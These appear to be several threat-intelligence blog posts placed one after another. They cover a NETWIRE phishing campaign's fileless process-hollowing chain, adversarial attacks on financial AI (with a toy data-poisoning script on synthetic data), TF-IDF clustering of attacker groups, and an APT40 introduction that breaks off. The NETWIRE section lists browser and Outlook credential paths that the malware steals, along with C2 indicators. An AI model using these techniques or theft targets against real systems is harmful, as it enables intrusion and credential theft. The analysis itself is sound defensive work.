
Dissecting a NETWIRE Phishing Campaign’s Usage of Process Hollowing

Introduction

Malware authors attempt to evade detection by executing their payload without having to write the executable file on the disk. One of the most commonly seen techniques of this "fileless" execution is code injection. Rather than executing the malware directly, attackers inject the malware code into the memory of another process that is already running.

Due to its presence on all Windows 7 and later machines and the sheer number of supported features, PowerShell has been a favorite tool of attackers for some time. FireEye has published multiple reports where PowerShell was used during initial malware delivery or during post-exploitation activities. Attackers have abused PowerShell to easily interact with other Windows components to perform their activities with stealth and speed.

This blog post explores a recent phishing campaign observed in February 2019, where an attacker targeted multiple customers and successfully executed their payload without having to write the executable dropper or the payload to disk. The campaign involved the use of VBScript, PowerShell and the .NET framework to perform a code injection attack using a process hollowing technique. The attacker abused PowerShell's ability to load a .NET assembly directly into memory to execute malicious code without creating any PE files on the disk.

Activity Summary

The user is prompted to open a document stored on Google Drive. The name of the file, shown in Figure 1, suggests that the actor was targeting members of the airline industry that use a particular aircraft model. We have observed an increasing number of attackers relying on cloud-based file storage services to host their payloads and bypass firewall restrictions.


Figure 1: Malicious script hosted on Google Drive

As seen in Figure 2, attempting to open the script raises an alert from Internet Explorer saying that the publisher could not be verified. In our experience, many users will choose to ignore the warning and open the document.


Figure 2: Alert raised by Internet Explorer

Upon execution, after multiple levels of obfuscation, a PowerShell script is executed that loads a .NET assembly from a remote URL, functions of which are then used to inject the final payload (NETWIRE Trojan) into a benign Microsoft executable using process hollowing. This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables.

Technical Details

The initial document contains VBScript code. When the user opens it, Wscript is spawned by iexplore to execute this file. The script uses multiple layers of obfuscation to bypass static scanners, and ultimately runs a PowerShell script for executing the binary payload.

Obfuscation techniques used during different levels of script execution are shown in Figure 3 and Figure 4.


Figure 3: Type 1 obfuscation technique, which uses log functions to resolve a wide character


Figure 4: Type 2 obfuscation technique, which uses split and replace operations

This script then downloads and executes another encoded .vbs script from a paste.ee URL, as seen in Figure 5. Paste.ee is a less regulated alternative to Pastebin and we have seen multiple attacks using this service to host the payload. Since the website uses TLS, most firewall solutions cannot detect the malicious content being downloaded over the network.


Figure 5: Downloading the second-stage script and creating a scheduled task

The script achieves persistence by copying itself to Appdata/Roaming and using schtasks.exe to create a scheduled task that runs the VBScript every 15 minutes.

After further de-obfuscation of the downloaded second-stage VBScript, we obtain the PowerShell script that is executed through a shell object, as shown in Figure 6.


Figure 6: De-obfuscated PowerShell script

The PowerShell script downloads two Base64-encoded payloads from paste.ee that contain binary executable files. The strings are stored as PowerShell script variables and no files are created on disk.  

Microsoft has provided multiple ways of interacting with the .NET framework in PowerShell to enhance it through custom-developed features. These .NET integrations with PowerShell are particularly attractive to attackers due to the limited visibility that traditional security monitoring tools have around the runtime behaviors of .NET processes. For this reason, exploit frameworks such as CobaltStrike and Metasploit have options to generate their implants in .NET assembly code.

Here, the attackers have used the Load method from the System.Reflection.Assembly .NET Framework class. After the assembly is loaded as an instance of System.Reflection.Assembly, the members can be accessed through that object similarly to C#, as shown in Figure 7.


Figure 7: Formatted PowerShell code

The code identifies the installed version of .NET and uses it later to dynamically resolve the path to the .NET installation folder. The decoded dropper assembly is passed as an argument to the Load method. The resulting class instance is stored as a variable.

The objects of the dropper are accessed through this variable and method R is invoked. Method R of the .NET dropper is responsible for executing the final payload.

The following are the parameters for method R:

  • Path to InstallUtil.exe (or other .NET framework tools)
  • Decoded NETWIRE trojan

When we observed the list of processes spawned during the attack (Figure 8), we did not see the payload spawned as a separate process.  


Figure 8: Processes spawned during attack

We observed that the InstallUtil.exe process was being created in suspended mode. Once it started execution, we compared its memory artifacts to a benign execution of InstallUtil.exe and concluded that the malicious payload is being injected into the memory of the newly spawned InstallUtil.exe process. We also observed that no arguments are passed to InstallUtil, which would cause an error under normal execution since InstallUtil always expects at least one argument.

From a detection evasion perspective, the attacker has chosen an interesting approach. Even if the PowerShell process creation is detected, InstallUtil.exe is executed from its original path. Furthermore, InstallUtil.exe is a benign file often used by internal automations. To an unsuspecting system administrator, this might not seem malicious.

When we disassembled the .NET code and removed the obfuscation to understand how the code injection was performed, we were able to identify the Win32 API calls associated with process hollowing (Figure 9).


Figure 9: Windows APIs used in .NET dropper for process hollowing

After reversing and modifying the code of the C# dropper to invoke R from main, we were able to confirm that when the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point. When the process hollowing is complete, the parent PowerShell process is terminated.

High-Level Analysis of the Payload

The final payload was identified by FireEye Intelligence as a NETWIRE backdoor. The backdoor receives commands from a command and control (C2) server, performs reconnaissance that includes the collection of user data, and returns the information to the C2 server.

Capabilities of the NETWIRE backdoor include key logging, reverse shell, and password theft. The backdoor uses a custom encryption algorithm to encrypt data and then writes it to a file created in the ./LOGS directory.

The malware also contains a custom obfuscation algorithm to hide registry keys, APIs, DLL names, and other strings from static analysis. Figure 10 provides the decompiled version of the custom decoding algorithm used on these strings.


Figure 10: Decompiled string decoding algorithm

From reversing and analyzing the behavior of the malware, we were able to identify the following capabilities:

  • Record mouse and keyboard events
  • Capture session logon details
  • Capture system details
  • Take screenshots
  • Monitor CPU usage
  • Create fake HTTP proxy

From the list of decoded strings, we were able to identify other features of this sample:

Stealing data from an email client:

  • “POP3”
  • “IMAP”
  • “SMTP”
  • “HTTP”
  • “Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\”
  • “Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook\\”
  • “Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\”

Stealing login details from browsers:

  • “\Google\Chrome\User Data\Default\Login Data”
  • “\Chromium\User Data\Default\Login Data”
  • “\Comodo\Dragon\User Data\Default\Login Data”
  • “\Yandex\YandexBrowser\User Data\Default\Login Data”
  • “\Opera Software\Opera Stable\Login Data”
  • “Software\Microsoft\Internet Explorer\IntelliForms\Storage2”
  • “vaultcli.dll: VaultOpenVault,VaultCloseVault,VaultEnumerateItem,VaultGetItem,VaultFree”
  • “select *  from moz_login”

A complete report on the NETWIRE backdoor family is available to customers who subscribe to the FireEye Intelligence portal.

Indicators of Compromise

Host-based indicators:

  • dac4ed7c1c56de7d74eb238c566637aa – Initial attack vector .vbs file

Network-based indicators (C2 domains of the NETWIRE Trojan):

  • 178.239.21[.]62:1919 – kingshakes[.]linkpc[.]net
  • 105.112.35[.]72:3575 – homi[.]myddns[.]rocks

FireEye Detection

FireEye detection names for the indicators in the attack:

Endpoint Security

  • Exploit Guard: Blocks execution of wscript
  • IOC: POWERSHELL DOWNLOADER D (METHODOLOGY)
  • AV: Trojan.Agent.DRAI

Network Security

  • Backdoor.Androm

Email Security

  • Malicious.URL
  • Malware.Binary.vbs

Conclusion

Malware authors continue to use different "fileless" process execution techniques to reduce the number of indicators on an endpoint. The lack of visibility into .NET process execution combined with the flexibility of PowerShell makes this technique all the more effective.

FireEye Endpoint Security and FireEye Network Security detect and block this attack at several stages of the attack chain.

Acknowledgement

We would like to thank Frederick House, Arvind Gowda, Nart Villeneuve and Nick Carr for their valuable feedback.

Breaking the Bank: Weakness in Financial AI Applications

Currently, threat actors possess limited access to the technology required to conduct disruptive operations against financial artificial intelligence (AI) systems and the risk of this targeting type remains low. However, there is a high risk of threat actors leveraging AI as part of disinformation campaigns to cause financial panic. As AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available, and operations targeting the financial industry will be increasingly likely in the future.

AI Compounds Both Efficiency and Risk

Financial entities increasingly rely on AI-enabled applications to streamline daily operations, assess client risk, and detect insider trading. However, researchers have demonstrated how exploiting vulnerabilities in certain AI models can adversely affect the final performance of a system. Cyber threat actors can potentially leverage these weaknesses for financial disruption or economic gain in the future.

Recent advances in adversarial AI research highlight vulnerabilities in some of the AI techniques used by the financial sector. Data poisoning attacks, or manipulating a model's training data, can affect the end performance of a system by leading the model to generate inaccurate outputs or assessments. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly. It should be noted that adversarial AI research demonstrates how anomalies in a model do not necessarily point users toward a wrong answer, but rather redirect users away from the more correct output. Additionally, some cases of compromise require threat actors to obtain a copy of the model itself, through reverse engineering or by compromising the machine learning pipeline of the target. The following are some vulnerabilities that assume this white-box knowledge of the models under attack (a toy data-poisoning sketch follows the list):

  • Classifiers are used for detection and identification, such as object recognition in driverless cars and malware detection in networks. Researchers have demonstrated how these classifiers can be susceptible to evasion, meaning objects can be misclassified due to inherent weaknesses in the model (Figure 1).


Figure 1: Examples of classifier evasion where AI models identified 6 as 2

  • Researchers have highlighted how data poisoning can influence the outputs of AI recommendation systems. By changing reward pathways, adversaries can make a model suggest a suboptimal output such as reckless trades resulting in substantial financial losses. Additionally, groups have demonstrated a data-poisoning attack where attackers did not have control over how the training data was labeled.
  • Natural language processing applications can analyze text and generate a basic understanding of the opinions expressed, also known as sentiment analysis. Recent papers highlight how users can input corrupt text training examples into sentiment analysis models to degrade the model's overall performance and guide it to misunderstand a body of text.
  • Compromises can also occur when the threat actor has limited access and understanding of the model’s inner-workings. Researchers have demonstrated how open access to the prediction functions of a model as well as knowledge transfer can also facilitate compromise.
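The label-flipping form of data poisoning referenced in the list above is easy to demonstrate on a toy classifier. The sketch below is a minimal illustration, assuming scikit-learn and entirely synthetic data; it is not a reproduction of any real attack or financial model.

```python
# Toy illustration of a data-poisoning (label-flipping) attack on a classifier.
# Entirely synthetic data; for illustration only.
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split

X, y = make_classification(n_samples=2000, n_features=20, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

# Baseline: model trained on clean labels.
clean_model = LogisticRegression(max_iter=1000).fit(X_train, y_train)
print("clean accuracy:    %.3f" % clean_model.score(X_test, y_test))

# Poisoning: an attacker flips the labels of 40% of one class in the
# training set, biasing the model against recognizing that class.
rng = np.random.default_rng(0)
ones = np.where(y_train == 1)[0]
flip_idx = rng.choice(ones, size=int(0.4 * len(ones)), replace=False)
y_poisoned = y_train.copy()
y_poisoned[flip_idx] = 0

poisoned_model = LogisticRegression(max_iter=1000).fit(X_train, y_poisoned)
print("poisoned accuracy: %.3f" % poisoned_model.score(X_test, y_test))
```

Because the flipped labels all come from one class, the fitted boundary shifts against that class and held-out accuracy degrades, while the training pipeline itself reports no error; that silence is what makes undetected poisoning dangerous.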

How Financial Entities Leverage AI

AI can process large amounts of information very quickly, and financial institutions are adopting AI-enabled tools to make accurate risk assessments and streamline daily operations. As a result, threat actors likely view financial service AI tools as an attractive target to facilitate economic gain or financial instability (Figure 2).


Figure 2: Financial AI tools and their weaknesses

Sentiment Analysis

Use

Branding and reputation are variables that help analysts plan future trade activity and examine potential risks associated with a business. News and online discussions offer a wealth of resources to examine public sentiment. AI techniques, such as natural language processing, can help analysts quickly identify public discussions referencing a business and examine the sentiment of these conversations to inform trades or help assess the risks associated with a firm.

Potential Exploitation

Threat actors can potentially insert fraudulent data that could generate erroneous analyses regarding a publicly traded firm. For example, threat actors could distribute false negative information about a company that could have adverse effects on a business' future trade activity or lead to a damaging risk assessment. Manipulating the data used to train a model can be particularly powerful if it remains undetected, since "finished" models are often trusted implicitly.

Threat Actors Using Disinformation to Cause Financial Panic

FireEye assesses with high confidence that there is a high risk of threat actors spreading false information that triggers AI-enabled trading and causes financial panic. Additionally, threat actors can leverage AI techniques to generate manipulated multimedia or "deep fakes" to facilitate such disruption.

False information can have considerable market-wide effects. Malicious actors have a history of distributing false information to facilitate financial instability. For example, in April 2013, the Syrian Electronic Army (SEA) compromised the Associated Press (AP) Twitter account and announced that the White House was attacked and President Obama sustained injuries. After the false information was posted, stock prices plummeted.


Figure 3: Tweet from the Syrian Electronic Army (SEA) after compromising Associated Press's Twitter account

  • Malicious actors distributed false messaging that triggered bank runs in Bulgaria and Kazakhstan in 2014. In two separate incidents, criminals sent emails, text messages, and social media posts suggesting bank deposits were not secure, causing customers to withdraw their savings en masse.
  • Threat actors can use AI to create manipulated multimedia videos or "deep fakes" to spread false information about a firm or market-moving event. Threat actors can also use AI applications to replicate the voice of a company's leadership to conduct fraudulent trades for financial gain.
  • We have observed one example where a manipulated video likely impacted the outcome of a political campaign.

Portfolio Management

Use

Several financial institutions are employing AI applications to select stocks for investment funds, or in the case of AI-based hedge funds, automatically conduct trades to maximize profits. Financial institutions can also leverage AI applications to help customize a client's trade portfolio. AI applications can analyze a client's previous trade activity and propose future trades analogous to those already found in a client's portfolio.

Potential Exploitation

Actors could influence recommendation systems to redirect a hedge fund toward irreversible bad trades, causing the company to lose money (e.g., flooding the market with trades that can confuse the recommendation system and cause the system to start trading in a way that damages the company).

Moreover, many of the automated trading tools used by hedge funds operate without human supervision and conduct trade activity that directly affects the market. This lack of oversight could leave future automated applications more vulnerable to exploitation as there is no human in the loop to detect anomalous threat activity.

Threat Actors Conducting Suboptimal Trades

We assess with moderate confidence that manipulating trade recommendation systems poses a moderate risk to AI-based portfolio managers.

  • The diminished human involvement with trade recommendation systems coupled with the irreversibility of trade activity suggest that adverse recommendations could quickly escalate to a large-scale impact.
  • Additionally, operators can influence recommendation systems without access to sophisticated AI technologies, instead using knowledge of the market and mass trades to degrade the application's performance.
  • We have previously observed malicious actors targeting trading platforms and exchanges, as well as compromising bank networks to conduct manipulated trades.
  • Both state-sponsored and financially motivated actors have incentives to exploit automated trading tools to generate profit, destabilize markets, or weaken foreign currencies.
  • Russian hackers reportedly leveraged Corkow malware to place $500M worth of trades at non-market rates, briefly destabilizing the dollar-ruble exchange rate in February 2015. Future criminal operations could leverage vulnerabilities in automated trading algorithms to disrupt the market with a flood of automated bad trades.

Compliance and Fraud Detection

Use

Financial institutions and regulators are leveraging AI-enabled anomaly detection tools to ensure that traders are not engaging in illegal activity. These tools can examine trade activity, internal communications, and other employee data to ensure that workers are not capitalizing on advanced knowledge of the market to engage in fraud, theft, insider trading, or embezzlement.

Potential Exploitation

Sophisticated threat actors can exploit the weaknesses in classifiers to alter an AI-based detection tool and mischaracterize anomalous illegal activity as normal activity. Manipulating the model helps insider threats conduct criminal activity without fear of discovery.

Threat Actors Camouflaging Insider Threat Activity

Currently, threat actors possess limited access to the kind of technology required to evade these fraud detection systems, and we therefore assess with high confidence that the threat of this activity type remains low. However, as AI financial tools become more commonplace, adversarial methods to exploit these tools will also become more available, and insider threats leveraging AI to evade detection will likely increase in the future.

Underground forums and social media posts demonstrate there is a market for individuals with insider access to financial institutions. Insider threats could exploit weaknesses in AI-based anomaly detectors to camouflage nefarious activity, such as external communications, erratic trades, and data transfers, as normal activity.

Trade Simulation

Use

Financial entities can use AI tools that leverage historical data from previous trade activity to simulate trades and examine their effects. Quant-fund managers and high-speed traders can use this capability to strategically plan future activity, such as the optimal time of the day to trade. Additionally, financial insurance underwriters can use these tools to observe the impact of market-moving activity and generate better risk assessments.

Potential Exploitation

By exploiting inherent weaknesses in an AI model, threat actors could lull a company into a false sense of security regarding the way a trade will play out. Specifically, threat actors could find out when a company is training their model and inject corrupt data into a dataset being used to train the model. Subsequently, the end application generates an incorrect simulation of potential trades and their consequences. These models are regularly trained on the latest financial information to improve a simulation's performance, providing threat actors with multiple opportunities for data poisoning attacks. Additionally, some high-speed traders speculate that threats could flood the market with fake sell orders to confuse trading algorithms and potentially cause the market to crash.

FireEye Threat Intelligence has previously examined how financially motivated actors can leverage data manipulation for profit through pump and dump scams and stock manipulation.

Threat Actors Conducting Insider Trading

FireEye assesses with moderate confidence that the current risk of threat actors leveraging these attacks is low as exploitations of trade simulations require sophisticated technology as well as additional insider intelligence regarding when a financial company is training their model. Despite these limitations, as financial AI tools become more popular, adversarial methods to exploit these tools are also likely to become more commonplace on underground forums and via state-sponsored threats. Future financially motivated operations could monitor or manipulate trade simulation tools as another means of gaining advanced knowledge of upcoming market activity.

Risk Assessment and Modeling

Use

AI can help the financial insurance sector's underwriting process by examining client data and highlighting features that it considers vulnerable prior to market-moving actions (joint ventures, mergers & acquisitions, research & development breakthroughs, etc.). Creating an accurate insurance policy ahead of market catalysts requires a risk assessment to highlight a client's potential weaknesses.

Financial services can also employ AI applications to improve their risk models. Advances in generative adversarial networks can help risk management by stress-testing a firm's internal risk model to evaluate performance or highlight potential vulnerabilities in a firm's model.

Potential Exploitation

If a country is conducting market-moving events with a foreign business, state-sponsored espionage actors could use data poisoning attacks to cause AI models to over or underestimate the value or risk associated with a firm to gain a competitive advantage ahead of planned trade activity. For example, espionage actors could feasibly use this knowledge and help turn a joint venture into a hostile takeover or eliminate a competitor in a bidding process. Additionally, threat actors can exploit weaknesses in financial AI tools as part of larger third-party compromises against high-value clients.

Threat Actors Influencing Trade Deals and Negotiations

With high confidence, we consider the current threat risk to trade activity and business deals to be low, but as more companies leverage AI applications to help prepare for market-moving catalysts, these applications will likely become an attack surface for future espionage operations.

In the past, state-sponsored actors have employed espionage operations during collaborations with foreign companies to ensure favorable business deals. Future state-sponsored espionage activity could leverage weaknesses in financial modeling tools to help nations gain a competitive advantage.

Outlook and Implications

Businesses adopting AI applications should be aware of the risks and vulnerabilities introduced with these technologies, as well as the potential benefits. It should be noted that AI models are not static; they are routinely updated with new information to make them more accurate. This constant model training frequently leaves them vulnerable to manipulation. Companies should remain vigilant and regularly audit their training data to eliminate poisoned inputs. Additionally, where applicable, AI applications should incorporate human supervision to ensure that erroneous outputs or recommendations do not automatically result in financial disruption.

AI's inherent limitations also pose a problem as the financial sector increasingly adopts these applications for its operations. The lack of transparency in how a model arrived at its answer is problematic for analysts who are using AI recommendations to conduct trades. Without an explanation for its output, it is difficult to determine liability when a trade has negative outcomes. This lack of clarity can lead analysts to mistrust an application and eventually refrain from using it altogether. Additionally, the rise of data privacy laws may also accelerate the need for explainable AI in the financial sector. Europe's General Data Protection Regulation (GDPR) stipulates that companies employing AI applications must have an explanation for decisions made by their models.

Some financial institutions have begun addressing this explainability problem by developing AI models that are inherently more transparent. Researchers have also developed self-explaining neural networks, which provide understandable explanations for the outputs generated by the system.

Going ATOMIC: Clustering and Associating Attacker Activity at Scale

At FireEye, we work hard to detect, track, and stop attackers. As part of this work, we learn a great deal of information about how various attackers operate, including details about commonly used malware, infrastructure, delivery mechanisms, and other tools and techniques. This knowledge is built up over hundreds of investigations and thousands of hours of analysis each year. At the time of publication, we have 50 APT or FIN groups, each of which has distinct characteristics. We have also collected thousands of uncharacterized 'clusters' of related activity about which we have not yet made any formal attribution claims. While unattributed, these clusters are still useful in the sense that they allow us to group and track associated activity over time.

However, as the information we collect grows larger and larger, we realized we needed an algorithmic method to assist in analyzing this information at scale, to discover new potential overlaps and attributions. This blog post will outline the data we used to build the model, the algorithm we developed, and some of the challenges we hope to tackle in the future.

The Data

As we detect and uncover malicious activity, we group forensically-related artifacts into 'clusters'. These clusters indicate actions, infrastructure, and malware that are all part of an intrusion, campaign, or series of activities which have direct links. These are what we call our "UNC" or "uncategorized" groups. Over time, these clusters can grow, merge with other clusters, and potentially 'graduate' into named groups, such as APT33 or FIN7. This graduation occurs only when we understand enough about their operations in each phase of the attack lifecycle and have associated the activity with a state-aligned program or criminal operation.

For every group, we can generate a summary document that contains information broken out into sections such as infrastructure, malware files, communication methods, and other aspects. Figure 1 shows a fabricated example with the various 'topics' broken out. Within each 'topic' – such as 'Malware' – we have various 'terms', which have associated counts. These numbers indicate how often we have recorded a group using that 'term'.


Figure 1: Example group 'documents' demonstrating how data about groups is recorded

The Problem

Our end goal is always to merge a new group either into an existing group once the link can be proven, or to graduate it to its own group if we are confident it represents a new and distinct actor set. These clustering and attribution decisions have thus far been performed manually and require rigorous analysis and justification. However, as we collect increasingly more data about attacker activities, this manual analysis becomes a bottleneck. Clusters risk going unanalyzed, and potential associations and attributions could slip through the cracks. Thus, we now incorporate a machine learning-based model into our intelligence analysis to assist with discovery, analysis, and justification for these claims.

The model we developed began with the following goals:

  1. Create a single, interpretable similarity metric between groups
  2. Evaluate past analytical decisions
  3. Discover new potential matches


Figure 2: Example documents highlighting observed term overlaps between two groups

The Model

This model uses a document clustering approach, familiar in the data science realm and often explained in the context of grouping books or movies. Applying the approach to our structured documents about each group, we can evaluate similarities between groups at scale.

First, we decided to model each topic individually. This decision means that each topic will result in its own measure of similarity between groups, which will ultimately be aggregated to produce a holistic similarity measure.

Here is how we apply this to our documents.

Within each topic, every distinct term is transformed into a value using a method called term frequency–inverse document frequency, or TF-IDF. This transformation is applied to every unique term for every document + topic, and the basic intuition behind it is to:

  1. Increase the importance of the term if it occurs often within the document.
  2. Decrease the importance of the term if it appears commonly across all documents.

This approach rewards distinctive terms such as custom malware families – which may appear for only a handful of groups – and down-weights common things such as 'spear-phishing', which appear for the vast majority of groups.

Figure 3 shows an example of TF-IDF being applied to a fictional "UNC599" for two terms: mal.sogu and mal.threebyte. These terms indicate the usages of SOGU and THREEBYTE within the 'malware' topic and thus we calculate their value within that topic using TF-IDF. The first (TF) value is how often those terms appeared as a fraction of all malware terms for the group. The second value (IDF) is the inverse of how frequently those terms appear across all groups. Additionally, we take the natural log of the IDF value, to smooth the effects of highly common terms – as you can see in the graph, when the value is close to 1 (very common terms), the log evaluates to near-zero, thus down-weighting the final TF x IDF value. Unique values have a much higher IDF, and thus result in higher values.


Figure 3: Breakdown of TF-IDF metric when evaluated for a single group in regard to malware
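To make the calculation concrete, the following sketch computes the same TF × IDF weighting with invented counts; the numbers are illustrative only and are not taken from Figure 3 or from any real group data.

```python
# Minimal sketch of the TF-IDF weighting described above.
# All counts below are invented for illustration.
import math

group_malware_counts = {"mal.sogu": 9, "mal.threebyte": 2, "mal.spearphish_doc": 14}
total_terms_in_topic = sum(group_malware_counts.values())

num_groups = 2000                    # total documents (groups) in the corpus
groups_containing = {                # how many groups have ever used each term
    "mal.sogu": 35,
    "mal.threebyte": 4,
    "mal.spearphish_doc": 1900,      # very common term -> IDF near zero
}

for term, count in group_malware_counts.items():
    tf = count / total_terms_in_topic                     # frequent within this group -> higher
    idf = math.log(num_groups / groups_containing[term])  # common across all groups -> lower
    print(f"{term}: tf={tf:.3f} idf={idf:.3f} tf-idf={tf * idf:.3f}")
```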

Once each term has been given a score, each group is now reflected as a collection of distinct topics, and each topic is a vector of scores for the terms it contains. Each vector can be conceived as an arrow, detailing the 'direction' that group is 'pointing' within that topic.

Within each topic space, we can then evaluate the similarity of various groups using another method – Cosine Similarity. If, like me, you did not love trigonometry – fear not! The intuition is simple. In essence, this is a measure of how parallel two vectors are. As seen in Figure 4, to evaluate two groups' usage of malware, we plot their malware vectors and see if they are pointing in the same direction. More parallel means they are more similar.


Figure 4: Simplified breakdown of Cosine Similarity metric when applied to two groups in the malware 'space'

One of the nice things about this approach is that large and small vectors are treated the same – thus, a new, relatively small UNC cluster pointing in the same direction as a well-documented APT group will still reflect a high level of similarity. This is one of the primary use cases we have, discovering new clusters of activity with high similarity to already established groups.
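In code, the per-topic comparison reduces to a standard cosine similarity over the TF-IDF weights. The sketch below is generic and uses made-up term weights; it is not FireEye's actual implementation or data.

```python
# Generic cosine similarity between two topic vectors of TF-IDF weights.
# Vectors are dictionaries keyed by term; missing terms are treated as zero.
import math

def cosine_similarity(vec_a, vec_b):
    terms = set(vec_a) | set(vec_b)
    dot = sum(vec_a.get(t, 0.0) * vec_b.get(t, 0.0) for t in terms)
    norm_a = math.sqrt(sum(v * v for v in vec_a.values()))
    norm_b = math.sqrt(sum(v * v for v in vec_b.values()))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)

# Toy example: a small UNC cluster "pointing" the same way as a larger,
# well-documented group still scores highly, because vector length does
# not matter, only direction.
apt_group = {"mal.sogu": 0.8, "mal.threebyte": 0.4}
unc_group = {"mal.sogu": 0.2, "mal.threebyte": 0.1}
print(cosine_similarity(apt_group, unc_group))  # ~1.0 (parallel vectors)
```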

Using TF-IDF and Cosine Similarity, we can now calculate the topic-specific similarities for every group in our corpus of documents. The final step is to combine these topic similarities into a single, aggregate metric (Figure 5). This single metric allows us to quickly query our data for 'groups similar to X' or 'similarity between X and Y'. The question then becomes: What is the best way to build this final similarity?


Figure 5: Overall model flow diagram showing individual topic similarities and aggregation in to final similarity matrix

The simplest approach is to take an average, and at first that’s exactly what we did. However, this approach did not sit well with analyst intuition. As analysts, we feel that some topics matter more than others. Malware and methodologies should be more important than, say, server locations or target industries...right? However, when challenged to provide custom weightings for each topic, it was impossible to find an objective weighting system, free from analyst bias. Finally, we thought: "What if we used existing, known data to tell us what the right weights are?" In order to do that, we needed a lot of known – or "labeled" – examples of both similar and dissimilar groups.

Building a Labeled Dataset

At first our concept seemed straightforward: We would find a large dataset of labeled pairs, and then fit a regression model to accurately classify them. If successful, this model should give us the weights we wanted to discover.

Figure 6 shows some graphical intuition behind this approach. First, using a set of ‘labeled’ pairs, we fit a function which best predicts the data points.


Figure 6: Example Linear regression plot – in reality we used a Logistic Regression, but showing a linear model to demonstrate the intuition

Then, we use that same function to predict the aggregate similarity of un-labeled pairs (Figure 7).


Figure 7: Example of how we used the trained model to predict final similarity from individual topic similarities.

However, our data posed a unique problem in the sense that only a tiny fraction of all potential pairings had ever been analyzed. These analyses happened manually and sporadically, often the result of sudden new information from an investigation finally linking two groups together. As a labeled dataset, these pairs were woefully insufficient for any rigorous evaluation of the approach. We needed more labeled data.

Two of our data scientists suggested a clever approach: What if we created thousands of 'fake' clusters by randomly sampling from well-established APT groups? We could therefore label any two samples that came from the same group as definitely similar, and any two from separate groups as not similar (Figure 8). This gave us the ability to synthetically generate the labeled dataset we desperately needed. Then, using a linear regression model, we were able to elegantly solve this 'weighted average' problem rather than depend on subjective guesses.


Figure 8: Example similarity testing with 'fake' clusters derived from known APT groups
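A minimal sketch of this weighting step is shown below. It assumes the per-topic similarities for each labeled pair have already been computed; the topic names, data shapes, and randomly generated values are hypothetical stand-ins, not our production features.

```python
# Sketch: learn topic weights from labeled (similar / not similar) cluster pairs.
# X holds one row per pair of synthetic clusters, with one column per topic
# similarity, and y = 1 if both clusters were sampled from the same known
# group, else 0. The data here is random filler so the snippet runs.
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(1)
topics = ["malware", "methodology", "infrastructure", "targeting"]
X = rng.uniform(0, 1, size=(5000, len(topics)))            # per-topic similarities
y = (X @ np.array([0.4, 0.3, 0.2, 0.1])                    # hidden "true" weights
     + rng.normal(0, 0.1, 5000) > 0.5).astype(int)

clf = LogisticRegression(max_iter=1000).fit(X, y)
for topic, weight in zip(topics, clf.coef_[0]):
    print(f"{topic}: learned weight {weight:.2f}")

# The fitted model can then score unlabeled pairs of groups:
new_pair = np.array([[0.9, 0.7, 0.2, 0.1]])
print("aggregate similarity:", clf.predict_proba(new_pair)[0, 1])
```

The learned coefficients play the role of the topic weights we previously tried, and failed, to set by hand.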

Additionally, these synthetically created clusters gave us a dataset upon which to test various iterations of the model. What if we remove a topic? What if we change the way we capture terms? Using a large labeled dataset, we can now benchmark and evaluate performance as we update and improve the model.

To evaluate the model, we observe several metrics:

  • Recall for synthetic clusters we know come from the same original group – how many do we get right/wrong? This evaluates the accuracy of a given approach.
  • For individual topics, the 'spread' between the calculated similarity of related and unrelated clusters. This helps us identify which topics help separate the classes best.
  • The accuracy of a trained regression model, as a proxy for the 'signal' between similar and dissimilar clusters, as represented by the topics. This can help us identify overfitting issues as well.

Operational Use

In our daily operations, this model serves to augment and assist our intelligence experts. By presenting objective similarities, it can challenge biases and introduce new lines of investigation not previously considered. With thousands of clusters, and new ones added every day by analysts around the globe, even the most seasoned and aware intel analyst could be excused for missing a potential lead. However, our model is able to present probable merges and similarities to analysts on demand, and thus can assist them in discovery.

Upon deploying this to our systems in December 2018, we immediately found benefits. One example is outlined in this blog post about potentially destructive attacks. Since then we have been able to inform, discover, or justify dozens of other merges.

Future Work

Like all models, this one has its weaknesses and we are already working on improvements. There is label noise in the way we manually enter information from investigations. There is sometimes 'extraneous' data about attackers that is not (yet) represented in our documents. Most of all, we have not yet fully incorporated the 'time of activity' and instead rely on 'time of recording'. This introduces a lag in our representation, which makes time-based analysis difficult. What an attacker has done lately should likely mean more than what they did five years ago.

Taking this objective approach and building the model has not only improved our intel operations, but also highlighted data requirements for future modeling efforts. As we have seen in other domains, building a machine learning model on top of forensic data can quickly highlight potential improvements to data modeling, storage, and access. Further information on this model can also be viewed in this video, from a presentation at the 2018 CAMLIS conference.

We have thus far enjoyed taking this approach to augmenting our intelligence model and are excited about the potential paths forward. Most of all, we look forward to the modeling efforts that help us profile, attribute, and stop attackers.

APT40: Examining a China-Nexus Espionage Actor

FireEye is highlighting a cyber espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state-sponsored actor we call APT40. The actor has conducted operations since at least 2013 in support of China’s naval modernization effort. The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies. More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative, including Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom. This China-nexus cyber espionage group was previously reported as TEMP.Periscope and TEMP.Jumper.

Mission

In December 2016, China’s People’s Liberation Army Navy (PLAN) seized a U.S. Navy unmanned underwater vehicle (UUV) operating in the South China Sea. The incident paralleled China’s actions in cyberspace; within a year, APT40 was observed masquerading as a UUV manufacturer and targeting universities engaged in naval research. That incident was one of many carried out to acquire advanced technology to support the development of Chinese naval capabilities. We believe APT40’s emphasis on maritime issues and naval technology ultimately supports China’s ambition to establish a blue-water navy.

